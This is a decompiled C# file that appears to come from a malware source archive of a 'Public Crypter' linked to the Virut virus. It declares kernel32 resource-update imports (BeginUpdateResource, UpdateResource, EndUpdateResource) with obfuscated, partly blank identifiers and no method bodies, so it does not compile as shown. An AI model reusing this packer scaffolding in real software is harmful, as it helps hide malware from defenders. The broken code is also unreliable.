MalwareSourceCode/MSIL/Virus/Win32/V/Virus.Win32.Virut.ce-d1c1a097ee65bcbdb837a528eb91652ea74c5b5ac7d41670ff2946e6d8dd6d9f/ऄࡆ.cs

42 lines
1.5 KiB
C#
Raw Normal View History

2022-08-18 11:28:56 +00:00
// Decompiled with JetBrains decompiler
// Type: ऄ࠹.ऄࡆ
// Assembly: L3G!T™ Public Crypter 1.0, Version=1.0.0.1, Culture=neutral, PublicKeyToken=null
// MVID: FCDEF2F2-8E7E-4528-B12E-ED99013B2DCE
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Virut.ce-d1c1a097ee65bcbdb837a528eb91652ea74c5b5ac7d41670ff2946e6d8dd6d9f.exe
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
namespace \u0839
{
[StandardModule]
internal sealed class
{
[MethodImpl(MethodImplOptions.NoInlining)]
private static IntPtr (object _param0);
[DllImport("kernel32.dll", EntryPoint = "UpdateResource", SetLastError = true)]
[MethodImpl(MethodImplOptions.NoInlining)]
private static extern bool (
IntPtr _param0,
string _param1,
string _param2,
ushort _param3,
IntPtr _param4,
uint _param5);
[DllImport("kernel32.dll", EntryPoint = "BeginUpdateResource", SetLastError = true)]
[MethodImpl(MethodImplOptions.NoInlining)]
private static extern IntPtr (string _param0, [MarshalAs(UnmanagedType.Bool)] bool _param1);
[DllImport("kernel32.dll", EntryPoint = "EndUpdateResource", SetLastError = true)]
[MethodImpl(MethodImplOptions.NoInlining)]
private static extern bool (IntPtr _param0, bool _param1);
[MethodImpl(MethodImplOptions.NoInlining)]
public static bool (string _param0, byte[] _param1, int _param2);
}
}